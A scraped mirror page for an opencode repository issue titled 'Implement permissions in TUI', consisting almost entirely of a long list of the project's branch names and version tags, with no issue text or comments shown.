mirror of
https://github.com/anomalyco/opencode.git
synced 2026-07-22 18:25:32 -04:00
Implement permissions in TUI #169
Closed
opened 2026-02-16 17:25:32 -05:00 by yindo
·
65 comments
No Branch/Tag Specified
dev
v2-syntax-theme
turn-token-message
theme-docs
v2
service-test-timeout
canonical-tool-output
responses-incomplete-reason
patch-error-messages
figma-plugin
beta
production
snapshot-repository
codemode-catalog-diffs
base-ui-theme
nxl-acp-delete
nxl-acp-lifecycle
css-design-system
nxl-acp-v1
nxl-acp-sdk
nxl-acp-elicitation
alibaba-images
item-reference-investigation
wsl-shell-env
wsl-env-load
stream-eof-finish
nvidia-minimax-thinking
pr-38231-assets
pr-38224-assets
model-flicker
default-background
terminal-queries
event-batching
port-plugins
gemini-thinking-level
patch-symlink-policy
session-version-sentinel
client-service
service-channel-config
webfetch-images
search-integration
billing-details
shell-exit-grace
desktop-image-backgrounds
copilot-endpoint
bound-tool-output
workspace-model-block
remove-promo
collapse-model-providers
review-sidebar-hydration
collapse-questions
location-startup-timing
remove-output-paths
shell-output-preview
quark-timeline
raw-tool-recovery
dialog-hover-fix
server-profiles
server-switcher
kimi-mfjs-schema
session-options-hook
interleaved-fields
remote-workspaces-plan
fix-initial-message
undo-git-guard
pr-37575-assets
opentui-binary-repro
startup-lock-release
system-theme-v2
llm-error-types
tui-plugin-load
external-defaults
productionclear
pr-37513-assets
console-auth-refresh
v2-app-api
backend-adapter-v2
oc-clipboard-and-paste
test/hot-reload-regressions
provider-benchmark
shell-progress-tail
model-cycle-palette
theme-toggle-copy
flaky-provider-tests
permission-modal-keyboard
shell-output-alignment
session-http-hook
permission-highlight
activity-panel
workspace-copy
interrupt-not-found
device-org-select
v2-subagent-limit
vertex-xai-default
reasoning-replay
agent-picker-custom
effect-dynamic-tools
patch-empty-hang
fix/empty-assistant-output
favorites-cli-config
simulated-tools
console-analytics-logger
simulation-terminal-frame-capture
feature-defaults
free-model-logo
service-restart
interrupt-stop-race
xai-oauth
background-indicator-inline
home-shortcut-align
compaction-model-marker
provider-config-shape
interface-toggle
install-layout-eligibility
tools-menu
mcp-location-refresh
session-picker-crash
optimistic-submit
dialog-action-focus
llm-terminal-contract
llm-remove-provider-error
remove-subtle-syntax
title-small-model
dialog-empty-states
permission-panel
api-dsl-cleanup
app-backend-v2
free-model-badge
compaction-percent
thought-toggle
home-session-scroll
llm-error-redesign
luna-oauth-fix
tool-flat-draft
v2-shell-utf8
remove-starptech
effort-values-none
config-dialog
update-tsgo
bounded-compaction-prod
stale-form-submit
dismiss-stale-form
bounded-compaction
agent-picker-variants
config-dir-repro
shell-tail-output
v2-integrations
quick-undo
startup-error-cause
subagent-panel-ui
lazy-fff
optimistic-input
zsh-positional
v2-diff-route
plugin-session-rename
gpt56-max
shortcut-screenshots
service-status
context-overflow
random-tool-catalog
review-nav-spacing
architecture-review
duplicate-event-logs
fix-shell-tab
v2-agent-env
plugin-watch-fix
compaction-cleanup
fix-compaction
genai-observability
agent-permission-order
tui-pending
catalog-repros
catalog-cold-start
console-login-logs
fix/tui-fresh-session-prompt
review-terminal
model-reset-repro
reasoning-variants
improve-caching
team-members
promise-chaining
tabs-launch-screenshots
compaction-steer
agent-env-markers
daemon-election
retry-layout
bash-streaming-fix
bash-tool-crash
restore-session-paging
provider-entrypoints
model-input-defaults
fix-initial-message-page-size
background-return
model-capability-defaults
runner-scenario-dsl
location-watch-guard
fix-shell-count
session-model-sync
new-session-commands
interrupt-tool-hang
codemode-service
mcp-attachments
stdlib-gaps
codemode-object-delete
json-callbacks
code-mode-opencode
drive-manifest
firecrawl-search
persisted-suspense
mcp-resource-app
mcp-resource-ui
mcp-resource-api
media-attachment
instruction-rename
destructuring-assign
codemode-audit
schema-reexports
event-subscribe
nxl/vcs-plugin-api
global-forms
revert-prompt
fix-stale-tools
service-version-guard
partial-refund-ledger
sdk-js-imports
jlongster/simulation-improvements
promise-named-types
tool-output
execute-code-mode-v2
compaction-indicator
subagent-command
catalog-readiness
pending-tool-error
zen-body-limit
form-tui
step-settlement
settlement-ledger
provider-packages
elicitation-timeout
codemode-opencode-adapter
optimize-hooks
models-log-leak
zen-accounting-latency
form-elicitation
codemode-opencode-wiring
codemode-opencode-integration
models-refresh-daemon
v2-model-refresh
filesystem-simulation
context-checkpoint
system-context
subagent-notify
subagent-resume
simulation-spec-v2
directory-attachment-expansion
zen-headers-timeout
config-effect-v2
embedded-config-seam
config-ownership
shell-background-notice
compaction-idle-status
session-tab-remount
publish-server
directory-attachments
content-filter-notice
settings-model-clipping
home-autocomplete-location
tabs-restore
plugin-runtime-bridge
simulation-spec
optimistic-prompt
reasoning-model-api
tool-result-api
beta-badge
prompt-submit-clear
prompt-attachments
mcp-prompts
background-shortcut
debug-windows-opentui-standalone-repro-release
fix-empty-sessions-list
core-node-consumers
model-selection
snapshot-otui
pty-env-route
status-frame-fix
daxbox-servers
shell-output-flush
shell-tool-test
auth-list
remove-default-layers
jlongster/opencode-all-tests-more
native-provider-clean
context-tooltip-v2
native-provider-core
native-provider-stack
deferred-tools
delete-email-action
poll-updates
jlongster/test-batch
session-forking
plugin-patterns
anthropic-thinking-variants
merge-dev-into-v2
fix-windows-abbreviate-home
project-edit-update
streaming-prd
zen-refund-accounting
fish-completion
cache-code-highlights
review-session-pane
sdk-generation-dev-check
clean-desktop-deps
clean-http-recorder-deps
clean-opencode-deps
clean-session-ui-deps
clean-stats-app-deps
clean-ui-deps
clean-web-deps
clean-app-deps
clean-cli-deps
clean-console-app-deps
clean-console-core-deps
clean-console-function-deps
clean-console-mail-deps
clean-console-support-deps
clean-core-deps
clean-root-deps
tui-child-picker
core-project-relocation
complete-client
open-auth-url
desktop-relocated
child-session-picker
fix-event-type
typecheck-28263387070
refresh-singleflight
jlongster/location-nodes
home-active-indicator
session-step-interrupted
interrupt-loading
fix/tui-preserve-renderer-error
fix/provider-session-failures
frank-production-validation-20260626
embedded-live-tail
fix/openai-stateless-reasoning-continuation
session-event-stream
responses-stream-retry
mcp-core-skeleton
server-auto-approve
opentui-retry
timeline-scroll-state
protocol-events
published-events
native-provider-config
native-provider-packages
oc-1.17.10-hotfix
new-session-model
tab-custom-color
feat/tui-render-state-dump
fix/tui-palette-question-mode
otui-native-yoga
feature/expand-paste-summary
todo-dock-motion
mcp-search-tool
tab-shrink
session-provider-errors
isolate-oauth-headers
verify-mcp-auth
secure-oauth-api
mcp-reconnect
restrict-mcp-env
redact-config-secrets
atomic-oauth-callback
native-provider-schema
add-model-comparison-pages
question-paste
simplify-target-layouts
fix-mention-mime
tagged-error-lint
websocket-auth
headless-console-login
mobile-utility-ui
ios-pwa-shell
mobile-bottom-nav
mobile-session-layout
mobile-home-layout
plugin-internal
fix/v2-queue-after-terminal-failure
http-recorder-release
custom-image-defaults
consolidate-todo-event
normalize-step-event-versions
fix-session-subpath
simplify/v2-runner-transitions
run-core-tests
feat/v2-terminal-run-failures-dev
filesystem-errors
hide-read-arguments
layer-node-permit
layer-node-projector
layer-node-repocache
layer-node-sprompt
layer-node-projcopy
layer-node-location
layer-node-movesess
layer-node-locfs
layer-node-models
layer-node-locmut
layer-node-instruct
layer-node-cconfig
layer-node-watcher
layer-node-fmutation
layer-node-integrate
layer-node-cevent
layer-node-cspawn
layer-node-cagent
layer-node-cproject
layer-node-command
yolo-flag
layer-node-extdir
layer-node-cprocess
layer-node-cgit
layer-node-cripgrep
layer-node-csearch
figma-mcp-client
stabilize-ci-tests
core-tests-ci
project-copy-migration
mcp-prompt-refresh
mcp-oauth-refresh
workerd
share-listener-runtime
v2-global-nodes
server-node-graph
mcp-resource-content
fix/command-double-file
background-model-refresh
jlongster/project-copy-config
demo/pr-31617-session-location
feat/tui-copy-session-location
reasoning-options
reasoning-options-support
fix/opencode-bundle-fff
refactor/mcp-connection-results
refactor/reference-directory-parts
feat/mcp-resource-updated
fix/mcp-prompts-list-changed
feat/mcp-resource-list-changed
docs-go-pricing-explanation
refactor/tui-http-sdk
fix/v2-read-validation-failure
refactor/v2-session-run-coordinator
refactor/core-provider-turn
feat/v2-terminal-run-failures
fix/v2-session-wake-retry-dev
feat/core-v2-background-agent
fix/http-recorder-release
fix/v2-session-wake-retry
fix/bash-tool-settlement
fix/v2-headless-permission-policy
fix/v2-binary-detection
fix/v2-read-images
fix/v2-read-errors
feat/core-v2-overflow-recovery
feat/jsonl-log-file
feat/core-v2-session-context-epoch
fix-bedrock-1
fix/session-metadata-migration-repair
pr-30929-demo-video
nexxeln-copy-git-worktree-path
fix/tui-worker-rpc-errors
refactor/core-v2-message-identity
fix/core-v2-sequence-index-invariants
refactor/core-account-file-agents
feat/core-command-registry
fix/tui-rpc-errors
fix/openai-codex-route-timeouts
fix/openai-websocket-header-timeout
refactor/remove-aisdk-option-fields
dustin/improve-memory-usage
feat/sdk-oagen-effect-emitter
nxl/consolidate-project-references
fix/prompt-loop-shutdown
feat/stripe-lake-ingest
kit/tui-scenario-frames
test/core-location-filesystem-canonical-paths
fix/zen-provider-sse-errors
dustin/clickable-titles
fix/free-tier-limit-cta
fix-model-selection
kit/pr-30051-screenshots
fix/xai-provider-upstream-pdf-support
chore/opencode-ai-provider-updates
feat/mcp-add-inline-args
refactor/provider-inline-local-helpers
fix/tui-syntax-builtins
fix/tui-question-keybindings
nxl/session-status-parent-id
feat/core-config-service
fix/free-model-sort
jlongster/workspace-v2
server-discovery
nxl/tui-message-keyboard-nav
fix-github-links-and-star
kit/tui-pending-tool-spinner
fix/task-running-continuation-feedback
fix-leader-none
fix/google-vertex-anthropic-auth-message
worktree-fork-toast
feat/request-aware-provider-fetch
fix/session-project-migration-time
kit/tui-optimistic-prompt-render
issue-13770-tool-output-docs
fix/google-vertex-metadata-warning
brendan/fix-e2e
question-endpoint
test/config-effect-dsl
fix-native-llm-options
compaction-adjustments
fix/app-v2-channel-gate
feat/core-database-schema-sync
fix/mcp-oauth-scope-and-callback-port
dustin/fix-structured-output-fields
kit/repro-zod-schema-leak
worktree-dead-exports
worktree-dead-files
nxl/fix-permission-specificity
jlongster/diff-viewer
nxl/v2-deferred-prompt
fix-retries
nxl/compaction-args
dustin/tool-choice-capability-support
cooper/opencode-codex-refresh-dedupe
refactor/native-runtime-prepared-request
storage-v2-service
drop-app-runtime-instance
worktree-test-port-audit
worktree-cli-effect-harness-2
worktree-cli-prewarm
refactor/session-prompt-parts
image-paths
test/config-instance-opencode-files
fix-env-json-parse-guards
test/config-instance-save-update
extract-part-text-helper
test/config-instance-template-loads
test/config-instance-first-slice
test/config-instance-agent-command
test/provider-instance-custom-models
test/provider-instance-model-lookup
worktree-global-bus-unify
test/provider-instance-first-slice
oc-issue-question-stuck
oc-snapshot-subdir
nxl/fix-auto-compaction-progress
fix/edit-project-dialog
brendan/message-timeline-scroll-virtualiser
jlongster/simulation-rebase
thdxr/auth-well-known-service
models-dev-global-snapshot
tui-markdown-h3-muted
debug-windows-opentui-bun-1.3.14
debug-windows-opentui-crash
serve-socket-mode
fix-event-sync
kit/delete-instance-local-context
upgrade-otui-0212
snapshot-npm-native-binary-install
emdash/27458-h7lu6
session-next-delta-events
new-colors
fix/event-stream-context-capture
fix/event-stream-context-27391
effect/session-transport-service
effect/config-paths-service
adjust-perm-array-logic
nxl/remove-http-notfound-fallback
nxl/render-config-json-diagnostics
nxl/render-tagged-config-errors
effect-test-permission-next
fix/desktop-session-status-tui-20260513090340
opencode/storage-engine-repository
effect/define-service-helper
disable-image-resizing-default
effect/util-process-effect-returning
effect-test-plugin-auth-override
effect/kill-tuiconfig-installation-facades
effect/unwrap-run-runtime-facades
effect-test-project-project
jlongster/fuzz-backend
fix-aws-issue
llm-native-inject-client
llm-native-runtime-openai
llm-native-prepare-tests
llm-native-request-adapter
llm-native-event-adapter
effect-test-provider-cluster1
brendan/lazy-init-plugins
kit/drop-project-sandboxes
claude/learn-new-skill-Ji0dn
fix/windows-instance-fixture-cleanup
worktree-draft+llm-usage-additive
styled-skill-errors
cleanup/effectify-remaining-compaction-tests
draft/session-timeline-rewind
worktree-http-recorder-cassette-seam
claude/review-recent-issues-Ck5UO
opencode/happy-cabin
cleanup/localize-id-prefixes
cleanup/openapi-workspace-path-pattern
llm-service-event-seam
kit/config-field-tolerant
kit/migrate-drift-tests-into-exerciser
kit/httpapi-exercise-via-sdk
kit/mcp-tolerate-bad-output-schemas
refactor-provider-model-status-schema
fix/httpapi-query-schema-drift
kit/fix-26435-legacy-session-model
kit/plugin-mutation-reproducers
kit/fix-workspace-time-used-migration
kit/revert-26550-fallback
kit/restore-hono-temporary
kit/fix-empty-bad-request-normalization
nxl/reference-file-mentions
fix/composer-image-preview-click
kit/httpapi-project-skill-repro
kit/httpapi-total-coverage
kit/httpapi-auth-cleanup-base
jlongster/workspace-external
fix-reasoning-efforts
fix/session-negative-output-tokens
make-review-normal
nxl/fix-anthropic-provider-tools
brendan/desktop-electron-refactor
fix/workspace-warp-typecheck
jlongster/warp
nxl/background-subagents
kit/pty-no-auth-parity
thdxr/v2-message-model-failures
kit/server-listen-native
kit/httpapi-listener-proxy-ws
kit/typed-session-not-found-sketch
fix-wellknown-down
kit/httpapi-not-found-shape
effect-drizzle-sqlite
question-lifecycle-effect-tests
kit/instance-loader-service
kit/effect-workspace-adapters
docs-sdk
kit/llm-approval-instance-ref
kit/session-llm-instance-state
effect-sync-event-service
jlongster/pin-session
azure-cognitive-improvements
adapter-rename
nxl/runtime-aware-search-service
deflake-test
moonshot-mfjs
nxl/small-model-subagents
brendan/new-composer-design
kit/httpapi-sdk-smoke-test
simon-reject-failure
kit/httpapi-json-shape-parity
kit/fix-httpapi-session-list-main
kit/httpapi-route-parity
fix-deepseek-reasoner
kit/httpapi-experimental-tools
deepseek-anthropic
fix/usage-chart-local-time
fix-shell-test
fix-config-ordering-issue
fix/beta-lazy-assistant-error
fix/session-event-typecheck-ci-shell
kit/httpapi-route-inventory-current
shell-test
simon-thread-network-defaults
fix-hover-selected
kit/schema-native-cleanup-ts
adjust-retry-logic
kit/session-schema-events
kit/config-permission-effect
Cramer/2026-03-25/bare-repo-bug
opencode-remote-voice
core
fix-zen-2
kit/multiedit-schema-fix-ts
kit/fix-release-publish-effect
kit/file-instance-context
kit/lsp-effect-refactor
kit/tui-terminal-notifications
tui-favorite-sort-on-query
openai-compaction
fix-copilot
opencode/swift-nebula
fix/project-worktree-external-directory-default
kit/tui-go-upsell-shimmer
kit/httpapi-workspace-schema-migration
kit/ns-plugin-loader-redo
kit/ns-plugin-loader
kit/ns-file-watcher
kit/repro-write-lsp-hang
kit/collapse-session
kit/collapse-patch
kit/retrofit-plugin-main
kit/retrofit-skill-main
kit/retrofit-permission-main
kit/retrofit-mcp-main
kit/retrofit-config-main
kit/unwrap-plugin-siblings
kit/unwrap-small-standalone
kit/unwrap-mcp-siblings
kit/unwrap-config-siblings
kit/self-reexport-migration-tooling
claude/verify-pr-comment-UuyAZ
claude/debug-e2e-tests-Hkgdb
kit/ns-heap
kit/ns-bus-event
kit/ns-standalone
kit/config-httpapi
kit/ns-file-3
kit/ns-session-3
kit/project-httpapi-reads
kit/ns-session
kit/ns-share
kit/ns-project
kit/ns-util-color
kit/ns-lsp
kit/ns-util-local-context
jlongster/sync-fenc
anthropic-fixes
feat/request-route-spans
kit/fs-search
kit/fs-tui-state
example-tui-plugin
cli-perf/tui-config
kit/fs-cli-io
kit/fs-plugin-npm
kit/llm-facade-cleanup
fix/snapshot-gitignored-index
kit/tui-facade-cleanup
kit/config-providers-httpapi-spike
kit/file-httpapi-spike
kit/workspace-httpapi-reads
nxl/mount-question-server
fix/session-prompt-permission-draft
fix-effect-context-bridges
followup-question-reply-inline
kit/fix-session-prompt-logger-interop
kit/question-httpapi-spike
kit/httpapi-route-inventory
kit/facade-session-prompt
jlongster/wip
nxl/fff-search-service
brendan/effect-env
kit/facade-project-20260413
kit/ripgrep-schema-source
kit/shell-job-service
fix/lsp-dead-root-prune
2.0
foo
facade/config
facade/lsp
facade/file
facade/provider
kit/ai-sdk-motel-bridge
oc-run
kit/e2e-seed-runtime-scope
brendan/electron-window-state
go-hero-banner-glm51-promo
snapshot-node-shim-stuff
fix/tui-session-diff-summary
oc-release-0.1.98
fix/snapshot-gitignore-respect
oc-basecode
worktree-agent-ab6ff98a
layered-deferred-comp
oc-startup
feat/tui-logo-radial-pulse
claude/effect-migration-review-Qyu6m
fix-anthropic-transform
kit/effect-sync-event
kit/effect-workspace
kit/eliminate-message-v2-roundtrips
worktree-agent-ab5855c0
kit/motel-session-telemetry
kit/tool-effect-multiedit
task-spec-executor-split
kit/tool-effect-invalid
worktree-feat+otel-bridge
kit/effect-native-tool-interrupt
jlongster/tui-workspaces-ux
kit/permission-flow-ux
nxl/deflake-webfetch-memory-test
npmcli-config
brendan/node-server-types
pr-21017
app/startup-splash
no-diff-virtualization
opencode/shiny-cactus
nxl/fix-diffs-header-sticky
nxl/shell-mode-tray
message-v3
opencode/gentle-pixel
oc-run-pinned
kit/prompt-abort-cleanup
opencode-suggest
rankings
copilot/research-opencode-server-plugin-api
kit/console-org-switcher
kit/ci-unit-reporting
figma-tokens
copilot/fix-spawn-error-windows
kit/dev-memory-observe
kit/remove-e2e-url-repro
effect-sync-event
effect/summary
pr-18308
worktree-audit-effect-services
test/processor-mock-server
fix/session-tool-metadata
opencode/glowing-tiger
claude/variant-popover-number-keys-gc6Bo
kit/format-child-process-spawner
jlongster/flaky-plugin-test
timeline-spacing-cleanup
feat/fff-search-tools
pr-18335
refactor/server-route-organization
jlongster/remove-workspace-server
kit/zen-stream-diagnostics
worktree-agent-a682f34a
spinner-concepts
openai-websocket
brendan-cli-codesign
brendan/cli-codesign
kit/windows-session-restore
opencode/cosmic-mountain
opencode/quick-orchid
perf/tool-memory
input-cleanup
opencode/sunny-comet
log-worktree-error-details
remove-context-tooltip-from-tab
tui-experimental-design
kit/effectify-command-review
brendan/better-session-id-handling
fix/lazy-facades
fix/insufferable-cycle-cyclone
kit/effectify-worktree
kit/effectify-tool-registry
kit/effectify-plugin
kit/effectify-pty
kit/effectify-command
kit/effectify-session-status
feat/auto-accept-permissions
kit/skill-lazy-init
fix-plugin-provider-behavior
fix/stale-running-session-ui
opencode-2-0
opencode/quiet-pixel
enterprise-lead-tracking
fix-e2e
kit/effect-bus
gitlab-version
add-model-reconciliation
jlongster/effectify-event-route
fix/zen-openai-response-usage
refactor/effect-pattern-migration
no-projects-empty-state
nexxeln/readme-small-tweak
test-branch
refactor/delete-scheduler
fix/shell-tab-shell-mode
effectify-skill
rhys/fast-mode-toggle
fix/flaky-question-dock-e2e
no-project-empty-state
fix/webkit-diff-viewer-crash
repro/watcher-als-bug
kit/repro-interrupted-text
startup
revert-17354-opencode/mighty-garden
move-status
perf/tui-session-history-cursor
effect-auth-foundation
console-subcommands
title-bar-cleanup
effect-log-compat
node-pty
fix/interrupt-idle-reason-poc
fix/interrupt-double-sound
opencode/proud-rocket
jlongster/automatic-session-routing
refactor/node-server-adapter
add-api-shape
node-build
jlongster/revert-sighup
fix/memory-tui-cache-listeners
auto-accept-permissions
pr-16286
default-explore-models
kit-pr
kit-pr-ahhhh
fix/16323-keyed-show-callbacks
feat/hashline-edit-experimental-v2
fix/git-fsmonitor-cleanup
snapshot-spawn-server-logs
implement-background-agents
opencode/happy-planet
fix/subagent-navigation-inline-click
go-page
fix/daytona-plugin-link-15976
opencode/hidden-orchid
tweaks
sidebar-fade-scroll
migrate-enterprise-to-nextjs
migrate-web-to-nextjs
migrate-app-to-nextjs
migrate-console-app-to-nextjs
fix/beta-stack-aware-sync
feature/tui-assistant-tokens-per-second
opencode/misty-falcon
snapshot-node-pty
update-stats
legal-req
commit-history
mhart/fix-cloning-slowness
chore/duplicate-issues-agent-dev
chore/duplicate-issues-agent
migrate-skill-discovery
migrate-mcp
migrate-config
optimize-apply-patch
temp
test-fields
brendan/nsis-vc-redistributables
chore-cleanup
feat/reference-agent
fix/attach-default-cwd
clean-modified-files
feat/discord-bot
v5-v6
feat/fff-file-search
snapshot-windows-desktop
fix-read-tool-for-webfetch
K-Mistele/dev
provider-optional-fields
feature/session-handoff
models-endpoint
opencode/sunny-harbor
utilize-family-in-dialog
review
tui-claude-style
rm-footer
fix/shiki-highlight-engine
fix/plugin-install-config
fix/plugin-install-location
feat/update-to-include-discord
git-slop-v2
docs-export
app/open-button
feature/workspace-domain
redesign-run-command
git-slop
opencode/clever-falcon
ripgrep-tree-paths
adjust-instructions-logic
fix-tool-ordering
workflow/publish-updates
chore-update-deps
feat/turborepo-caching
trigger-publish-on-beta
add-beta-branch-trigger
remove/nix-desktop-workflow
ci
fix-markdown-parsing
remove-highlights-template
update-to-add-learn-script
release-highlights-template
fixing-changelog-spacing
fixing-changelog-ui
fix-changelog-json
changelog-swr-caching
add-dynamic-agents-resolving
release-notes
fix/claude-pro-max-docs-warning
web-fixing-download-buton-on-changelog
fix/google-vertex-anthropic-thinking
sqlite
fix-azure-issue
desktop-poilsh-styles-ui-ux
desktop-shortcuts-panel
scheduler-module
apply-patch
cleanup-server-routes
fix-tool-outputs
fix-ai-message-issue
updated-black-page-performance
fix-black-page-view-transition-safari
update-design-subscriptions
fix-markdown-parser
fix/mcp-timeout
fix-id-issue
upgrade-bun
black-page-transitions-design-updates
official-copilot-plugin
plan-mode
read-plurals
cli-run-improvements
style-new-tips-layout
codex-auth
disable-auto-server
fix-model-dialog
fix-plugin-hook
feat/question-multiselect
new-toolbar-layout
feature/tui-sidebar-overlay
ui-improvements-some-animations
ask-question-tool
truncate-to-file
update-perms
truncation
snaphot-style-multiple-commands-input
experimental-mentions
queue-on-track
add-ignored
rename-repo-sst-to-anomalyco
permission-rework
ripgrep-tests
variants-docs
fix-custom-model-variants
read-global-claude-skills
changelog-updates
thinking-toggle-wip
style-current-todo
tui-shortcuts-panel
update-toggle-and-model-selection
small-screens
feature/skill-tool
feature/agent-skills
add-tests
llm-centralization
interleaved-fixes
interleaved-thinking
docs
sdk
bash-tweaks
provider-cleanup
fix-issue
blacksmith-migration-0ddfdb5
fix/cli-clean-exit-on-model-errors
pr-38252-videos
pr-37967-screenshots-final
pr-37967-screenshots-v2
pr-37967-screenshots
v1.18.4
v1.18.3
v1.18.2
v1.18.1
v1.18.0
v1.17.20
v1.17.19
pr-36567-inline-evidence
pr-36567-evidence
pr-36516-evidence
v1.17.18
v1.17.17
v1.17.16
v1.17.15
v1.17.14
v1.17.13
v1.17.12
v1.17.11
v1.17.10
pr-33649-assets
v1.17.9
v1.17.8
v1.17.7
v1.17.6
v1.17.5
v1.17.4
v1.17.3
v1.17.2
v1.17.1
v1.17.0
v1.16.2
v1.16.0
github-v1.2.25
v1.15.13
pr-29948-screenshots
v1.15.12
github-v1.2.24
github-v1.2.23
v1.15.11
v1.15.10
v1.15.9
v1.15.7
v1.15.6
v1.15.5
v1.15.4
v1.15.3
v1.15.2
v1.15.1
v1.15.0
v1.14.51
v1.14.50
v1.14.49
v1.14.48
v1.14.47
v1.14.46
v1.14.45
v1.14.44
v1.14.43
v1.14.42
v1.14.41
v1.14.40
v1.14.39
v1.14.38
v1.14.37
v1.14.35
v1.14.34
v1.14.33
v1.14.32
v1.14.31
v1.14.30
v1.14.29
v1.14.28
v1.14.27
v1.14.26
v1.14.25
v1.14.24
v1.14.23
v1.14.22
v1.14.21
v1.14.20
v1.14.19
v1.14.18
v1.14.17
v1.4.14
v1.4.12
v1.4.11
v1.4.10
v1.4.9
v1.4.8
v1.4.7
github-v1.2.22
github-v1.2.21
github-v1.2.20
v1.4.6
v1.4.5
v1.4.4
v1.4.3
v1.4.2
v1.4.1
v1.4.0
latest
v1.3.17
v1.3.16
v1.3.15
v1.3.14
v1.3.13
v1.3.12
v1.3.11
v1.3.10
v1.3.9
v1.3.8
v1.3.7
v1.3.6
v1.3.5
v1.3.4
v1.3.3
github-v1.2.19
v1.3.2
v1.3.1
v1.3.0
v1.2.27
v1.2.26
v1.2.25
v1.2.24
v1.2.23
v1.2.22
v1.2.21
v1.2.20
v1.2.19
github-v1.2.18
v1.2.18
v1.2.17
v1.2.16
v1.2.15
v1.2.14
v1.2.13
v1.2.12
v1.2.11
github-v1.2.17
v1.2.10
v1.2.9
v1.2.8
v1.2.7
github-v1.2.16
v1.2.6
v1.2.5
v1.2.4
v1.2.3
v1.2.2
v1.2.1
v1.2.0
v1.1.65
v1.1.64
v1.1.63
v1.1.62
v1.1.61
v1.1.60
v1.1.59
v1.1.58
v1.1.57
v1.1.56
v1.1.55
v1.1.54
github-v1.2.15
v1.1.53
v1.1.52
v1.1.51
v1.1.50
v1.1.49
v1.1.48
v1.1.47
v1.1.46
v1.1.45
v1.1.44
github-v1.2.14
v1.1.43
v0.0.0-ci-202601291718
v0.0.0-ci-202601291635
v0.0.0-ci-202601291626
v1.1.42
v1.1.41
v1.1.40
v1.1.39
v1.1.38
v1.1.37
v1.1.36
v1.1.35
v1.1.34
v1.1.33
v1.1.32
v1.1.31
v1.1.30
v1.1.29
v1.1.28
v1.1.27
v1.1.26
github-v1.2.13
v1.1.25
v1.1.24
v1.1.23
v1.1.21
v1.1.20
v1.1.19
v1.1.18
github-v1.2.12
v1.1.17
v1.1.16
v1.1.15
v1.1.14
v1.1.13
v1.1.12
v1.1.11
v1.1.10
v1.1.8
v1.1.7
v1.1.6
v1.1.5
v1.1.4
v1.1.3
github-v1.2.11
v1.1.2
v1.1.1
github-v1.2.10
github-v1.2.9
github-v1.2.8
github-v1.2.7
v1.0.224
v1.0.223
v1.0.222
v1.0.221
v1.0.220
v1.0.219
v1.0.218
v1.0.217
v1.0.216
v1.0.215
v1.0.214
v1.0.213
v1.0.212
v1.0.211
v1.0.210
v1.0.209
v1.0.208
v1.0.207
v1.0.206
vscode-v0.0.13
v1.0.205
v1.0.204
v1.0.203
v1.0.202
v1.0.201
v1.0.200
v1.0.199
v1.0.198
v1.0.197
v1.0.196
v1.0.195
v1.0.194
v1.0.193
v1.0.192
v1.0.191
v1.0.190
v1.0.189
v1.0.188
v1.0.187
v1.0.186
v1.0.185
github-v1.2.6
v1.0.184
v1.0.183
v1.0.182
v1.0.181
github-v1.2.5
github-v1.2.4
v1.0.180
v1.0.179
v1.0.178
v1.0.177
v1.0.176
v1.0.175
v1.0.174
v1.0.173
v1.0.172
v1.0.171
v1.0.170
v1.0.169
v1.0.168
github-v1.2.3
github-v1.2.2
v1.0.167
v1.0.166
v1.0.165
v1.0.164
github-v1.2.1
v1.0.163
v1.0.162
v1.0.161
v1.0.160
v1.0.159
v1.0.158
v1.0.157
v1.0.156
v1.0.155
v1.0.154
v1.0.153
v1.0.152
v1.0.151
v1.0.150
v1.0.149
v1.0.148
v1.0.147
v1.0.146
v1.0.145
v1.0.144
github-v1.2.0
github-v1.1.0
v1.0.143
v1.0.142
v1.0.141
v1.0.138
v1.0.137
v1.0.134
v1.0.133
v1.0.132
v1.0.131
v1.0.130
v1.0.129
v1.0.128
v1.0.127
v1.0.126
v1.0.125
v1.0.124
v1.0.123
v1.0.122
v1.0.121
v1.0.120
v1.0.119
v1.0.118
v1.0.117
v1.0.116
v1.0.115
v1.0.114
v1.0.113
v1.0.112
v1.0.111
v1.0.110
v1.0.109
v1.0.108
v1.0.107
v1.0.106
v1.0.105
v1.0.104
v1.0.103
v1.0.102
v1.0.101
v1.0.100
v1.0.99
v1.0.98
v1.0.97
v1.0.96
v1.0.95
v1.0.93
v1.0.94
v1.0.92
v1.0.91
v1.0.90
v1.0.89
v1.0.88
v1.0.87
v1.0.86
v1.0.85
v1.0.84
v1.0.83
v1.0.82
v1.0.81
v1.0.80
v1.0.79
v1.0.78
v1.0.77
v1.0.76
v1.0.75
v1.0.74
v1.0.73
v1.0.72
v1.0.71
v1.0.70
v1.0.69
v1.0.68
v1.0.67
v1.0.66
v1.0.65
v1.0.64
v0.0.2-feature-bench
v1.0.63
v0.0.1-feature-bench
v1.0.62
v1.0.61
v1.0.60
v1.0.59
v1.0.58
v1.0.57
v1.0.56
v1.0.55
v1.0.54
v1.0.53
v1.0.52
v1.0.51
v1.0.50
v1.0.49
v1.0.48
v1.0.47
v1.0.46
v1.0.45
v1.0.44
v1.0.43
v1.0.41
v1.0.40
v1.0.39
v1.0.38
v1.0.37
v1.0.36
v1.0.35
v1.0.34
v1.0.33
v1.0.32
v1.0.31
v1.0.30
v1.0.29
v1.0.28
v1.0.27
v1.0.26
v1.0.25
v1.0.24
v1.0.23
v1.0.22
v1.0.21
v1.0.20
v1.0.19
v1.0.18
v1.0.17
v1.0.16
v1.0.15
v1.0.14
v1.0.13
v1.0.12
v1.0.11
github-v1.0.10
v1.0.10
v1.0.9
v1.0.8
v1.0.7
v1.0.6
v1.0.5
v1.0.4
v1.0.3
v1.0.2
v1.0.1
v1.0.0
v0.15.31
v0.15.30
v0.15.29
v0.15.28
v0.15.27
v0.15.26
v0.15.25
v0.15.24
v0.15.23
v0.15.21
v0.15.22
v0.15.20
v0.15.19
v0.15.18
v0.15.17
v0.15.16
v0.15.15
v0.15.14
vscode-v0.0.12
vscode-v0.0.11
vscode-v0.0.10
v0.15.13
v0.15.12
v0.15.11
v0.15.10
v0.15.9
v0.15.8
v0.15.7
v0.15.6
github-v1.0.9
github-v1.0.8
github-v1.0.7
v0.15.5
v0.15.4
v0.15.3
v0.15.2
v0.15.1
v0.15.0
v0.14.7
v0.14.6
v0.14.5
v0.14.4
v0.14.3
v0.14.1
v0.14.0
v0.13.9
v0.13.8
v0.13.7
v0.13.6
v0.13.5
v0.13.4
v0.13.3
v0.13.2
v0.12.1
v0.12.0
v0.11.8
v0.11.7
v0.11.6
v0.11.5
v0.11.4
v0.11.3
v0.11.2
v0.11.1
v0.11.0
v0.0.0-202509210757
v0.10.4
v0.10.3
github-v1.0.6
v0.10.2
v0.10.1
